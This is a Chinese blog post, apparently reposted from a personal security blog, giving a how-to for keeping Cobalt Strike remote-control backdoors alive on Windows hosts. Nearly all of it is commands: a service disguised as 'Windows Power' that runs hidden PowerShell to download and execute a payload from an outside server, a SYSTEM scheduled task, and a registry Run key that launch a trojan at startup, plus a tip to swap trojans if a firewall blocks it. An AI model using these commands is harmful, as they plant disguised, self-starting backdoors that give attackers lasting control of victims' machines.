【远控使用】Cobalt Strike可持续后门的使用

admin
admin
admin
102262
文章
87
评论
2022年1月10日03:33:37评论74 views字数 765阅读2分33秒阅读模式

前言

  • Cobalt Strike的基础使用

一、服务器自启动配置

1、创建服务

1
 
shell sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.43.22:80/a'))\""

2、设置服务会自动启动

1
2
3
4
 
shell sc config "Windows Power" start= auto
shell sc description "Windows Power" "Windows auto service" #描述
shell sc start "Windows Power"   #来启动
shell net start Windows Power

会被防火墙拦截,也可以换个木马执行

image-20210917162510909

二、计划任务

1、创建任务

1
 
shell schtasks /create /tn "windowsup" /tr "C:\artifact.exe" /ru SYSTEM /sc onstart

2、修改字符集和查询

1
2
 
chcp 437 
shell schtasks /query /tn windowsup

3、启动

1
 
shell schtasks /run /tn windowsup

image-20210917164534933

image-20210917165216574

4、删除计划

1
 
shell schtasks /delete /tn windowsup

三、注册表启动

系统启动时,就会执行木马

1
 
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\artifact.exe" /f

image-20210917170307071

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【远控使用】Cobalt Strike可持续后门的使用http://cn-sec.com/archives/730022.html

发表评论

匿名网友 填写信息